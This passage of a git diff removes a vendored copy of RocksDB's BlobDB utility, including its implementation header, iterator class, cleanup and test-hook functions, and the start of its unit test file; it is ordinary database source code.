-      reinterpret_cast<ColumnFamilyHandleImpl*>(DefaultColumnFamily())->cfd();
-  // Get a snapshot to avoid blob file get deleted between we
-  // fetch and index entry and reading from the file.
-  ManagedSnapshot* own_snapshot = nullptr;
-  const Snapshot* snapshot = read_options.snapshot;
-  if (snapshot == nullptr) {
-    own_snapshot = new ManagedSnapshot(db_);
-    snapshot = own_snapshot->snapshot();
-  }
-  auto* iter = db_impl_->NewIteratorImpl(
-      read_options, cfd, snapshot->GetSequenceNumber(),
-      true /*allow_blob*/);
-  return new BlobDBIterator(own_snapshot, iter, this);
-}
-
-Status DestroyBlobDB(const std::string& dbname, const Options& options,
-                     const BlobDBOptions& bdb_options) {
-  const ImmutableDBOptions soptions(SanitizeOptions(dbname, options));
-  Env* env = soptions.env;
-
-  Status status;
-  std::string blobdir;
-  blobdir = (bdb_options.path_relative) ? dbname + "/" + bdb_options.blob_dir
-                                        : bdb_options.blob_dir;
-
-  std::vector<std::string> filenames;
-  env->GetChildren(blobdir, &filenames);
-
-  for (const auto& f : filenames) {
-    uint64_t number;
-    FileType type;
-    if (ParseFileName(f, &number, &type) && type == kBlobFile) {
-      Status del = env->DeleteFile(blobdir + "/" + f);
-      if (status.ok() && !del.ok()) {
-        status = del;
-      }
-    }
-  }
-  env->DeleteDir(blobdir);
-
-  Status destroy = DestroyDB(dbname, options);
-  if (status.ok() && !destroy.ok()) {
-    status = destroy;
-  }
-
-  return status;
-}
-
-#ifndef NDEBUG
-Status BlobDBImpl::TEST_GetBlobValue(const Slice& key, const Slice& index_entry,
-                                     PinnableSlice* value) {
-  return GetBlobValue(key, index_entry, value);
-}
-
-std::vector<std::shared_ptr<BlobFile>> BlobDBImpl::TEST_GetBlobFiles() const {
-  ReadLock l(&mutex_);
-  std::vector<std::shared_ptr<BlobFile>> blob_files;
-  for (auto& p : blob_files_) {
-    blob_files.emplace_back(p.second);
-  }
-  return blob_files;
-}
-
-std::vector<std::shared_ptr<BlobFile>> BlobDBImpl::TEST_GetObsoleteFiles()
-    const {
-  ReadLock l(&mutex_);
-  std::vector<std::shared_ptr<BlobFile>> obsolete_files;
-  for (auto& bfile : obsolete_files_) {
-    obsolete_files.emplace_back(bfile);
-  }
-  return obsolete_files;
-}
-
-void BlobDBImpl::TEST_DeleteObsoleteFiles() {
-  DeleteObsoleteFiles(false /*abort*/);
-}
-
-Status BlobDBImpl::TEST_CloseBlobFile(std::shared_ptr<BlobFile>& bfile) {
-  return CloseBlobFile(bfile);
-}
-
-Status BlobDBImpl::TEST_GCFileAndUpdateLSM(std::shared_ptr<BlobFile>& bfile,
-                                           GCStats* gc_stats) {
-  return GCFileAndUpdateLSM(bfile, gc_stats);
-}
-
-void BlobDBImpl::TEST_RunGC() { RunGC(false /*abort*/); }
-#endif  //  !NDEBUG
-
-}  // namespace blob_db
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/blob_db/blob_db_impl.h b/thirdparty/rocksdb/utilities/blob_db/blob_db_impl.h
deleted file mode 100644
index 9881107..0000000
--- a/thirdparty/rocksdb/utilities/blob_db/blob_db_impl.h
+++ /dev/null
@@ -1,546 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <atomic>
-#include <condition_variable>
-#include <limits>
-#include <list>
-#include <memory>
-#include <set>
-#include <string>
-#include <thread>
-#include <unordered_map>
-#include <utility>
-#include <vector>
-
-#include "db/db_iter.h"
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/db.h"
-#include "rocksdb/listener.h"
-#include "rocksdb/options.h"
-#include "rocksdb/wal_filter.h"
-#include "util/mpsc.h"
-#include "util/mutexlock.h"
-#include "util/timer_queue.h"
-#include "utilities/blob_db/blob_db.h"
-#include "utilities/blob_db/blob_file.h"
-#include "utilities/blob_db/blob_log_format.h"
-#include "utilities/blob_db/blob_log_reader.h"
-#include "utilities/blob_db/blob_log_writer.h"
-
-namespace rocksdb {
-
-class DBImpl;
-class ColumnFamilyHandle;
-class ColumnFamilyData;
-struct FlushJobInfo;
-
-namespace blob_db {
-
-class BlobFile;
-class BlobDBImpl;
-
-class BlobDBFlushBeginListener : public EventListener {
- public:
-  explicit BlobDBFlushBeginListener() : impl_(nullptr) {}
-
-  void OnFlushBegin(DB* db, const FlushJobInfo& info) override;
-
-  void SetImplPtr(BlobDBImpl* p) { impl_ = p; }
-
- protected:
-  BlobDBImpl* impl_;
-};
-
-// this implements the callback from the WAL which ensures that the
-// blob record is present in the blob log. If fsync/fdatasync in not
-// happening on every write, there is the probability that keys in the
-// blob log can lag the keys in blobs
-class BlobReconcileWalFilter : public WalFilter {
- public:
-  virtual WalFilter::WalProcessingOption LogRecordFound(
-      unsigned long long log_number, const std::string& log_file_name,
-      const WriteBatch& batch, WriteBatch* new_batch,
-      bool* batch_changed) override;
-
-  virtual const char* Name() const override { return "BlobDBWalReconciler"; }
-
-  void SetImplPtr(BlobDBImpl* p) { impl_ = p; }
-
- protected:
-  BlobDBImpl* impl_;
-};
-
-class EvictAllVersionsCompactionListener : public EventListener {
- public:
-  class InternalListener : public CompactionEventListener {
-    friend class BlobDBImpl;
-
-   public:
-    virtual void OnCompaction(int level, const Slice& key,
-                              CompactionListenerValueType value_type,
-                              const Slice& existing_value,
-                              const SequenceNumber& sn, bool is_new) override;
-
-    void SetImplPtr(BlobDBImpl* p) { impl_ = p; }
-
-   private:
-    BlobDBImpl* impl_;
-  };
-
-  explicit EvictAllVersionsCompactionListener()
-      : internal_listener_(new InternalListener()) {}
-
-  virtual CompactionEventListener* GetCompactionEventListener() override {
-    return internal_listener_.get();
-  }
-
-  void SetImplPtr(BlobDBImpl* p) { internal_listener_->SetImplPtr(p); }
-
- private:
-  std::unique_ptr<InternalListener> internal_listener_;
-};
-
-#if 0
-class EvictAllVersionsFilterFactory : public CompactionFilterFactory {
- private:
-  BlobDBImpl* impl_;
-
- public:
-  EvictAllVersionsFilterFactory() : impl_(nullptr) {}
-
-  void SetImplPtr(BlobDBImpl* p) { impl_ = p; }
-
-  virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-      const CompactionFilter::Context& context) override;
-
-  virtual const char* Name() const override {
-    return "EvictAllVersionsFilterFactory";
-  }
-};
-#endif
-
-// Comparator to sort "TTL" aware Blob files based on the lower value of
-// TTL range.
-struct blobf_compare_ttl {
-  bool operator()(const std::shared_ptr<BlobFile>& lhs,
-                  const std::shared_ptr<BlobFile>& rhs) const;
-};
-
-struct GCStats {
-  uint64_t blob_count = 0;
-  uint64_t num_deletes = 0;
-  uint64_t deleted_size = 0;
-  uint64_t retry_delete = 0;
-  uint64_t delete_succeeded = 0;
-  uint64_t overwritten_while_delete = 0;
-  uint64_t num_relocate = 0;
-  uint64_t retry_relocate = 0;
-  uint64_t relocate_succeeded = 0;
-  uint64_t overwritten_while_relocate = 0;
-  std::shared_ptr<BlobFile> newfile = nullptr;
-};
-
-/**
- * The implementation class for BlobDB. This manages the value
- * part in TTL aware sequentially written files. These files are
- * Garbage Collected.
- */
-class BlobDBImpl : public BlobDB {
-  friend class BlobDBFlushBeginListener;
-  friend class EvictAllVersionsCompactionListener;
-  friend class BlobDB;
-  friend class BlobFile;
-  friend class BlobDBIterator;
-
- public:
-  // deletions check period
-  static constexpr uint32_t kDeleteCheckPeriodMillisecs = 2 * 1000;
-
-  // gc percentage each check period
-  static constexpr uint32_t kGCFilePercentage = 100;
-
-  // gc period
-  static constexpr uint32_t kGCCheckPeriodMillisecs = 60 * 1000;
-
-  // sanity check task
-  static constexpr uint32_t kSanityCheckPeriodMillisecs = 20 * 60 * 1000;
-
-  // how many random access open files can we tolerate
-  static constexpr uint32_t kOpenFilesTrigger = 100;
-
-  // how many periods of stats do we keep.
-  static constexpr uint32_t kWriteAmplificationStatsPeriods = 24;
-
-  // what is the length of any period
-  static constexpr uint32_t kWriteAmplificationStatsPeriodMillisecs =
-      3600 * 1000;
-
-  // we will garbage collect blob files in
-  // which entire files have expired. However if the
-  // ttl_range of files is very large say a day, we
-  // would have to wait for the entire day, before we
-  // recover most of the space.
-  static constexpr uint32_t kPartialExpirationGCRangeSecs = 4 * 3600;
-
-  // this should be based on allowed Write Amplification
-  // if 50% of the space of a blob file has been deleted/expired,
-  static constexpr uint32_t kPartialExpirationPercentage = 75;
-
-  // how often should we schedule a job to fsync open files
-  static constexpr uint32_t kFSyncFilesPeriodMillisecs = 10 * 1000;
-
-  // how often to schedule reclaim open files.
-  static constexpr uint32_t kReclaimOpenFilesPeriodMillisecs = 1 * 1000;
-
-  // how often to schedule delete obs files periods
-  static constexpr uint32_t kDeleteObsoleteFilesPeriodMillisecs = 10 * 1000;
-
-  // how often to schedule check seq files period
-  static constexpr uint32_t kCheckSeqFilesPeriodMillisecs = 10 * 1000;
-
-  // when should oldest file be evicted:
-  // on reaching 90% of blob_dir_size
-  static constexpr double kEvictOldestFileAtSize = 0.9;
-
-  using BlobDB::Put;
-  Status Put(const WriteOptions& options, const Slice& key,
-             const Slice& value) override;
-
-  using BlobDB::Delete;
-  Status Delete(const WriteOptions& options, const Slice& key) override;
-
-  using BlobDB::Get;
-  Status Get(const ReadOptions& read_options, ColumnFamilyHandle* column_family,
-             const Slice& key, PinnableSlice* value) override;
-
-  using BlobDB::NewIterator;
-  virtual Iterator* NewIterator(const ReadOptions& read_options) override;
-
-  using BlobDB::NewIterators;
-  virtual Status NewIterators(
-      const ReadOptions& read_options,
-      const std::vector<ColumnFamilyHandle*>& column_families,
-      std::vector<Iterator*>* iterators) override {
-    return Status::NotSupported("Not implemented");
-  }
-
-  using BlobDB::MultiGet;
-  virtual std::vector<Status> MultiGet(
-      const ReadOptions& read_options,
-      const std::vector<Slice>& keys,
-      std::vector<std::string>* values) override;
-
-  virtual Status Write(const WriteOptions& opts, WriteBatch* updates) override;
-
-  virtual Status GetLiveFiles(std::vector<std::string>&,
-                              uint64_t* manifest_file_size,
-                              bool flush_memtable = true) override;
-  virtual void GetLiveFilesMetaData(
-      std::vector<LiveFileMetaData>* ) override;
-
-  using BlobDB::PutWithTTL;
-  Status PutWithTTL(const WriteOptions& options, const Slice& key,
-                    const Slice& value, uint64_t ttl) override;
-
-  using BlobDB::PutUntil;
-  Status PutUntil(const WriteOptions& options, const Slice& key,
-                  const Slice& value, uint64_t expiration) override;
-
-  Status LinkToBaseDB(DB* db) override;
-
-  BlobDBOptions GetBlobDBOptions() const override;
-
-  BlobDBImpl(DB* db, const BlobDBOptions& bdb_options);
-
-  BlobDBImpl(const std::string& dbname, const BlobDBOptions& bdb_options,
-             const DBOptions& db_options);
-
-  ~BlobDBImpl();
-
-#ifndef NDEBUG
-  Status TEST_GetBlobValue(const Slice& key, const Slice& index_entry,
-                           PinnableSlice* value);
-
-  std::vector<std::shared_ptr<BlobFile>> TEST_GetBlobFiles() const;
-
-  std::vector<std::shared_ptr<BlobFile>> TEST_GetObsoleteFiles() const;
-
-  Status TEST_CloseBlobFile(std::shared_ptr<BlobFile>& bfile);
-
-  Status TEST_GCFileAndUpdateLSM(std::shared_ptr<BlobFile>& bfile,
-                                 GCStats* gc_stats);
-
-  void TEST_RunGC();
-
-  void TEST_DeleteObsoleteFiles();
-#endif  //  !NDEBUG
-
- private:
-  class GarbageCollectionWriteCallback;
-  class BlobInserter;
-
-  Status OpenPhase1();
-
-  // Create a snapshot if there isn't one in read options.
-  // Return true if a snapshot is created.
-  bool SetSnapshotIfNeeded(ReadOptions* read_options);
-
-  Status GetBlobValue(const Slice& key, const Slice& index_entry,
-                      PinnableSlice* value);
-
-  Slice GetCompressedSlice(const Slice& raw,
-                           std::string* compression_output) const;
-
-  // Just before flush starts acting on memtable files,
-  // this handler is called.
-  void OnFlushBeginHandler(DB* db, const FlushJobInfo& info);
-
-  // is this file ready for Garbage collection. if the TTL of the file
-  // has expired or if threshold of the file has been evicted
-  // tt - current time
-  // last_id - the id of the non-TTL file to evict
-  bool ShouldGCFile(std::shared_ptr<BlobFile> bfile, uint64_t now,
-                    bool is_oldest_non_ttl_file, std::string* reason);
-
-  // collect all the blob log files from the blob directory
-  Status GetAllLogFiles(std::set<std::pair<uint64_t, std::string>>* file_nums);
-
-  // Close a file by appending a footer, and removes file from open files list.
-  Status CloseBlobFile(std::shared_ptr<BlobFile> bfile);
-
-  // Close a file if its size exceeds blob_file_size
-  Status CloseBlobFileIfNeeded(std::shared_ptr<BlobFile>& bfile);
-
-  uint64_t ExtractExpiration(const Slice& key, const Slice& value,
-                             Slice* value_slice, std::string* new_value);
-
-  Status PutBlobValue(const WriteOptions& options, const Slice& key,
-                      const Slice& value, uint64_t expiration,
-                      SequenceNumber sequence, WriteBatch* batch);
-
-  Status AppendBlob(const std::shared_ptr<BlobFile>& bfile,
-                    const std::string& headerbuf, const Slice& key,
-                    const Slice& value, uint64_t expiration,
-                    std::string* index_entry);
-
-  // find an existing blob log file based on the expiration unix epoch
-  // if such a file does not exist, return nullptr
-  std::shared_ptr<BlobFile> SelectBlobFileTTL(uint64_t expiration);
-
-  // find an existing blob log file to append the value to
-  std::shared_ptr<BlobFile> SelectBlobFile();
-
-  std::shared_ptr<BlobFile> FindBlobFileLocked(uint64_t expiration) const;
-
-  void Shutdown();
-
-  // periodic sanity check. Bunch of checks
-  std::pair<bool, int64_t> SanityCheck(bool aborted);
-
-  // delete files which have been garbage collected and marked
-  // obsolete. Check whether any snapshots exist which refer to
-  // the same
-  std::pair<bool, int64_t> DeleteObsoleteFiles(bool aborted);
-
-  // Major task to garbage collect expired and deleted blobs
-  std::pair<bool, int64_t> RunGC(bool aborted);
-
-  // asynchronous task to fsync/fdatasync the open blob files
-  std::pair<bool, int64_t> FsyncFiles(bool aborted);
-
-  // periodically check if open blob files and their TTL's has expired
-  // if expired, close the sequential writer and make the file immutable
-  std::pair<bool, int64_t> CheckSeqFiles(bool aborted);
-
-  // if the number of open files, approaches ULIMIT's this
-  // task will close random readers, which are kept around for
-  // efficiency
-  std::pair<bool, int64_t> ReclaimOpenFiles(bool aborted);
-
-  // periodically print write amplification statistics
-  std::pair<bool, int64_t> WaStats(bool aborted);
-
-  // background task to do book-keeping of deleted keys
-  std::pair<bool, int64_t> EvictDeletions(bool aborted);
-
-  std::pair<bool, int64_t> EvictCompacted(bool aborted);
-
-  std::pair<bool, int64_t> RemoveTimerQ(TimerQueue* tq, bool aborted);
-
-  // Adds the background tasks to the timer queue
-  void StartBackgroundTasks();
-
-  // add a new Blob File
-  std::shared_ptr<BlobFile> NewBlobFile(const std::string& reason);
-
-  Status OpenAllFiles();
-
-  // hold write mutex on file and call
-  // creates a Random Access reader for GET call
-  std::shared_ptr<RandomAccessFileReader> GetOrOpenRandomAccessReader(
-      const std::shared_ptr<BlobFile>& bfile, Env* env,
-      const EnvOptions& env_options);
-
-  // hold write mutex on file and call.
-  // Close the above Random Access reader
-  void CloseRandomAccessLocked(const std::shared_ptr<BlobFile>& bfile);
-
-  // hold write mutex on file and call
-  // creates a sequential (append) writer for this blobfile
-  Status CreateWriterLocked(const std::shared_ptr<BlobFile>& bfile);
-
-  // returns a Writer object for the file. If writer is not
-  // already present, creates one. Needs Write Mutex to be held
-  std::shared_ptr<Writer> CheckOrCreateWriterLocked(
-      const std::shared_ptr<BlobFile>& bfile);
-
-  // Iterate through keys and values on Blob and write into
-  // separate file the remaining blobs and delete/update pointers
-  // in LSM atomically
-  Status GCFileAndUpdateLSM(const std::shared_ptr<BlobFile>& bfptr,
-                            GCStats* gcstats);
-
-  // checks if there is no snapshot which is referencing the
-  // blobs
-  bool VisibleToActiveSnapshot(const std::shared_ptr<BlobFile>& file);
-  bool FileDeleteOk_SnapshotCheckLocked(const std::shared_ptr<BlobFile>& bfile);
-
-  bool MarkBlobDeleted(const Slice& key, const Slice& lsmValue);
-
-  bool FindFileAndEvictABlob(uint64_t file_number, uint64_t key_size,
-                             uint64_t blob_offset, uint64_t blob_size);
-
-  void CopyBlobFiles(
-      std::vector<std::shared_ptr<BlobFile>>* bfiles_copy,
-      std::function<bool(const std::shared_ptr<BlobFile>&)> predicate = {});
-
-  void FilterSubsetOfFiles(
-      const std::vector<std::shared_ptr<BlobFile>>& blob_files,
-      std::vector<std::shared_ptr<BlobFile>>* to_process, uint64_t epoch,
-      size_t files_to_collect);
-
-  uint64_t EpochNow() { return env_->NowMicros() / 1000000; }
-
-  Status CheckSize(size_t blob_size);
-
-  std::shared_ptr<BlobFile> GetOldestBlobFile();
-
-  bool EvictOldestBlobFile();
-
-  // the base DB
-  DBImpl* db_impl_;
-  Env* env_;
-  TTLExtractor* ttl_extractor_;
-
-  // the options that govern the behavior of Blob Storage
-  BlobDBOptions bdb_options_;
-  DBOptions db_options_;
-  EnvOptions env_options_;
-
-  // name of the database directory
-  std::string dbname_;
-
-  // by default this is "blob_dir" under dbname_
-  // but can be configured
-  std::string blob_dir_;
-
-  // pointer to directory
-  std::unique_ptr<Directory> dir_ent_;
-
-  std::atomic<bool> dir_change_;
-
-  // Read Write Mutex, which protects all the data structures
-  // HEAVILY TRAFFICKED
-  mutable port::RWMutex mutex_;
-
-  // Writers has to hold write_mutex_ before writing.
-  mutable port::Mutex write_mutex_;
-
-  // counter for blob file number
-  std::atomic<uint64_t> next_file_number_;
-
-  // entire metadata of all the BLOB files memory
-  std::map<uint64_t, std::shared_ptr<BlobFile>> blob_files_;
-
-  // epoch or version of the open files.
-  std::atomic<uint64_t> epoch_of_;
-
-  // opened non-TTL blob file.
-  std::shared_ptr<BlobFile> open_non_ttl_file_;
-
-  // all the blob files which are currently being appended to based
-  // on variety of incoming TTL's
-  std::multiset<std::shared_ptr<BlobFile>, blobf_compare_ttl> open_ttl_files_;
-
-  // packet of information to put in lockess delete(s) queue
-  struct delete_packet_t {
-    ColumnFamilyHandle* cfh_;
-    std::string key_;
-    SequenceNumber dsn_;
-  };
-
-  struct override_packet_t {
-    uint64_t file_number_;
-    uint64_t key_size_;
-    uint64_t blob_offset_;
-    uint64_t blob_size_;
-    SequenceNumber dsn_;
-  };
-
-  // LOCKLESS multiple producer single consumer queue to quickly append
-  // deletes without taking lock. Can rapidly grow in size!!
-  // deletes happen in LSM, but minor book-keeping needs to happen on
-  // BLOB side (for triggering eviction)
-  mpsc_queue_t<delete_packet_t> delete_keys_q_;
-
-  // LOCKLESS multiple producer single consumer queue for values
-  // that are being compacted
-  mpsc_queue_t<override_packet_t> override_vals_q_;
-
-  // atomic bool to represent shutdown
-  std::atomic<bool> shutdown_;
-
-  // timer based queue to execute tasks
-  TimerQueue tqueue_;
-
-  // only accessed in GC thread, hence not atomic. The epoch of the
-  // GC task. Each execution is one epoch. Helps us in allocating
-  // files to one execution
-  uint64_t current_epoch_;
-
-  // number of files opened for random access/GET
-  // counter is used to monitor and close excess RA files.
-  std::atomic<uint32_t> open_file_count_;
-
-  // should hold mutex to modify
-  // STATISTICS for WA of Blob Files due to GC
-  // collect by default 24 hourly periods
-  std::list<uint64_t> all_periods_write_;
-  std::list<uint64_t> all_periods_ampl_;
-
-  std::atomic<uint64_t> last_period_write_;
-  std::atomic<uint64_t> last_period_ampl_;
-
-  uint64_t total_periods_write_;
-  uint64_t total_periods_ampl_;
-
-  // total size of all blob files at a given time
-  std::atomic<uint64_t> total_blob_space_;
-  std::list<std::shared_ptr<BlobFile>> obsolete_files_;
-  bool open_p1_done_;
-
-  uint32_t debug_level_;
-
-  std::atomic<bool> oldest_file_evicted_;
-};
-
-}  // namespace blob_db
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/blob_db/blob_db_iterator.h b/thirdparty/rocksdb/utilities/blob_db/blob_db_iterator.h
deleted file mode 100644
index c8aa1ff..0000000
--- a/thirdparty/rocksdb/utilities/blob_db/blob_db_iterator.h
+++ /dev/null
@@ -1,104 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/iterator.h"
-#include "utilities/blob_db/blob_db_impl.h"
-
-namespace rocksdb {
-namespace blob_db {
-
-using rocksdb::ManagedSnapshot;
-
-class BlobDBIterator : public Iterator {
- public:
-  BlobDBIterator(ManagedSnapshot* snapshot, ArenaWrappedDBIter* iter,
-                 BlobDBImpl* blob_db)
-      : snapshot_(snapshot), iter_(iter), blob_db_(blob_db) {}
-
-  virtual ~BlobDBIterator() = default;
-
-  bool Valid() const override {
-    if (!iter_->Valid()) {
-      return false;
-    }
-    return status_.ok();
-  }
-
-  Status status() const override {
-    if (!iter_->status().ok()) {
-      return iter_->status();
-    }
-    return status_;
-  }
-
-  void SeekToFirst() override {
-    iter_->SeekToFirst();
-    UpdateBlobValue();
-  }
-
-  void SeekToLast() override {
-    iter_->SeekToLast();
-    UpdateBlobValue();
-  }
-
-  void Seek(const Slice& target) override {
-    iter_->Seek(target);
-    UpdateBlobValue();
-  }
-
-  void SeekForPrev(const Slice& target) override {
-    iter_->SeekForPrev(target);
-    UpdateBlobValue();
-  }
-
-  void Next() override {
-    assert(Valid());
-    iter_->Next();
-    UpdateBlobValue();
-  }
-
-  void Prev() override {
-    assert(Valid());
-    iter_->Prev();
-    UpdateBlobValue();
-  }
-
-  Slice key() const override {
-    assert(Valid());
-    return iter_->key();
-  }
-
-  Slice value() const override {
-    assert(Valid());
-    if (!iter_->IsBlob()) {
-      return iter_->value();
-    }
-    return value_;
-  }
-
-  // Iterator::Refresh() not supported.
-
- private:
-  void UpdateBlobValue() {
-    TEST_SYNC_POINT("BlobDBIterator::UpdateBlobValue:Start:1");
-    TEST_SYNC_POINT("BlobDBIterator::UpdateBlobValue:Start:2");
-    value_.Reset();
-    if (iter_->Valid() && iter_->IsBlob()) {
-      status_ = blob_db_->GetBlobValue(iter_->key(), iter_->value(), &value_);
-    }
-  }
-
-  std::unique_ptr<ManagedSnapshot> snapshot_;
-  std::unique_ptr<ArenaWrappedDBIter> iter_;
-  BlobDBImpl* blob_db_;
-  Status status_;
-  PinnableSlice value_;
-};
-}  // namespace blob_db
-}  // namespace rocksdb
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/blob_db/blob_db_test.cc b/thirdparty/rocksdb/utilities/blob_db/blob_db_test.cc
deleted file mode 100644
index 03396ee..0000000
--- a/thirdparty/rocksdb/utilities/blob_db/blob_db_test.cc
+++ /dev/null
@@ -1,1279 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include <algorithm>
-#include <cstdlib>
-#include <map>
-#include <memory>
-#include <string>
-#include <vector>
-
-#include "db/db_test_util.h"
-#include "port/port.h"
-#include "rocksdb/utilities/debug.h"
-#include "util/cast_util.h"
-#include "util/random.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-#include "util/testharness.h"
-#include "utilities/blob_db/blob_db.h"
-#include "utilities/blob_db/blob_db_impl.h"
-#include "utilities/blob_db/blob_index.h"
-
-namespace rocksdb {
-namespace blob_db {
-
-class BlobDBTest : public testing::Test {
- public:
-  const int kMaxBlobSize = 1 << 14;
-
-  struct BlobRecord {
-    std::string key;
-    std::string value;
-    uint64_t expiration = 0;
-  };
-
-  BlobDBTest()
-      : dbname_(test::TmpDir() + "/blob_db_test"),
-        mock_env_(new MockTimeEnv(Env::Default())),
-        blob_db_(nullptr) {
-    Status s = DestroyBlobDB(dbname_, Options(), BlobDBOptions());
-    assert(s.ok());
-  }
-
-  ~BlobDBTest() { Destroy(); }
-
-  Status TryOpen(BlobDBOptions bdb_options = BlobDBOptions(),
-                 Options options = Options()) {
-    options.create_if_missing = true;
-    return BlobDB::Open(options, bdb_options, dbname_, &blob_db_);
-  }
-
-  void Open(BlobDBOptions bdb_options = BlobDBOptions(),
-            Options options = Options()) {
-    ASSERT_OK(TryOpen(bdb_options, options));
-  }
-
-  void Reopen(BlobDBOptions bdb_options = BlobDBOptions(),
-              Options options = Options()) {
-    assert(blob_db_ != nullptr);
-    delete blob_db_;
-    blob_db_ = nullptr;
-    Open(bdb_options, options);
-  }
-
-  void Destroy() {
-    if (blob_db_) {
-      Options options = blob_db_->GetOptions();
-      BlobDBOptions bdb_options = blob_db_->GetBlobDBOptions();
-      delete blob_db_;
-      ASSERT_OK(DestroyBlobDB(dbname_, options, bdb_options));
-      blob_db_ = nullptr;
-    }
-  }
-
-  BlobDBImpl *blob_db_impl() {
-    return reinterpret_cast<BlobDBImpl *>(blob_db_);
-  }
-
-  Status Put(const Slice &key, const Slice &value) {
-    return blob_db_->Put(WriteOptions(), key, value);
-  }
-
-  void Delete(const std::string &key,
-              std::map<std::string, std::string> *data = nullptr) {
-    ASSERT_OK(blob_db_->Delete(WriteOptions(), key));
-    if (data != nullptr) {
-      data->erase(key);
-    }
-  }
-
-  Status PutUntil(const Slice &key, const Slice &value, uint64_t expiration) {
-    return blob_db_->PutUntil(WriteOptions(), key, value, expiration);
-  }
-
-  void PutRandomWithTTL(const std::string &key, uint64_t ttl, Random *rnd,
-                        std::map<std::string, std::string> *data = nullptr) {
-    int len = rnd->Next() % kMaxBlobSize + 1;
-    std::string value = test::RandomHumanReadableString(rnd, len);
-    ASSERT_OK(
-        blob_db_->PutWithTTL(WriteOptions(), Slice(key), Slice(value), ttl));
-    if (data != nullptr) {
-      (*data)[key] = value;
-    }
-  }
-
-  void PutRandomUntil(const std::string &key, uint64_t expiration, Random *rnd,
-                      std::map<std::string, std::string> *data = nullptr) {
-    int len = rnd->Next() % kMaxBlobSize + 1;
-    std::string value = test::RandomHumanReadableString(rnd, len);
-    ASSERT_OK(blob_db_->PutUntil(WriteOptions(), Slice(key), Slice(value),
-                                 expiration));
-    if (data != nullptr) {
-      (*data)[key] = value;
-    }
-  }
-
-  void PutRandom(const std::string &key, Random *rnd,
-                 std::map<std::string, std::string> *data = nullptr) {
-    PutRandom(blob_db_, key, rnd, data);
-  }
-
-  void PutRandom(DB *db, const std::string &key, Random *rnd,
-                 std::map<std::string, std::string> *data = nullptr) {
-    int len = rnd->Next() % kMaxBlobSize + 1;
-    std::string value = test::RandomHumanReadableString(rnd, len);
-    ASSERT_OK(db->Put(WriteOptions(), Slice(key), Slice(value)));
-    if (data != nullptr) {
-      (*data)[key] = value;
-    }
-  }
-
-  void PutRandomToWriteBatch(
-      const std::string &key, Random *rnd, WriteBatch *batch,
-      std::map<std::string, std::string> *data = nullptr) {
-    int len = rnd->Next() % kMaxBlobSize + 1;
-    std::string value = test::RandomHumanReadableString(rnd, len);
-    ASSERT_OK(batch->Put(key, value));
-    if (data != nullptr) {
-      (*data)[key] = value;
-    }
-  }
-
-  // Verify blob db contain expected data and nothing more.
-  void VerifyDB(const std::map<std::string, std::string> &data) {
-    VerifyDB(blob_db_, data);
-  }
-
-  void VerifyDB(DB *db, const std::map<std::string, std::string> &data) {
-    // Verify normal Get
-    auto* cfh = db->DefaultColumnFamily();
-    for (auto &p : data) {
-      PinnableSlice value_slice;
-      ASSERT_OK(db->Get(ReadOptions(), cfh, p.first, &value_slice));
-      ASSERT_EQ(p.second, value_slice.ToString());
-      std::string value;
-      ASSERT_OK(db->Get(ReadOptions(), cfh, p.first, &value));
-      ASSERT_EQ(p.second, value);
-    }
-
-    // Verify iterators
-    Iterator *iter = db->NewIterator(ReadOptions());
-    iter->SeekToFirst();
-    for (auto &p : data) {
-      ASSERT_TRUE(iter->Valid());
-      ASSERT_EQ(p.first, iter->key().ToString());
-      ASSERT_EQ(p.second, iter->value().ToString());
-      iter->Next();
-    }
-    ASSERT_FALSE(iter->Valid());
-    ASSERT_OK(iter->status());
-    delete iter;
-  }
-
-  void VerifyBaseDB(
-      const std::map<std::string, KeyVersion> &expected_versions) {
-    auto *bdb_impl = static_cast<BlobDBImpl *>(blob_db_);
-    DB *db = blob_db_->GetRootDB();
-    std::vector<KeyVersion> versions;
-    GetAllKeyVersions(db, "", "", &versions);
-    ASSERT_EQ(expected_versions.size(), versions.size());
-    size_t i = 0;
-    for (auto &key_version : expected_versions) {
-      const KeyVersion &expected_version = key_version.second;
-      ASSERT_EQ(expected_version.user_key, versions[i].user_key);
-      ASSERT_EQ(expected_version.sequence, versions[i].sequence);
-      ASSERT_EQ(expected_version.type, versions[i].type);
-      if (versions[i].type == kTypeValue) {
-        ASSERT_EQ(expected_version.value, versions[i].value);
-      } else {
-        ASSERT_EQ(kTypeBlobIndex, versions[i].type);
-        PinnableSlice value;
-        ASSERT_OK(bdb_impl->TEST_GetBlobValue(versions[i].user_key,
-                                              versions[i].value, &value));
-        ASSERT_EQ(expected_version.value, value.ToString());
-      }
-      i++;
-    }
-  }
-
-  void InsertBlobs() {
-    WriteOptions wo;
-    std::string value;
-
-    Random rnd(301);
-    for (size_t i = 0; i < 100000; i++) {
-      uint64_t ttl = rnd.Next() % 86400;
-      PutRandomWithTTL("key" + ToString(i % 500), ttl, &rnd, nullptr);
-    }
-
-    for (size_t i = 0; i < 10; i++) {
-      Delete("key" + ToString(i % 500));
-    }
-  }
-
-  const std::string dbname_;
-  std::unique_ptr<MockTimeEnv> mock_env_;
-  std::shared_ptr<TTLExtractor> ttl_extractor_;
-  BlobDB *blob_db_;
-};  // class BlobDBTest
-
-TEST_F(BlobDBTest, Put) {
-  Random rnd(301);
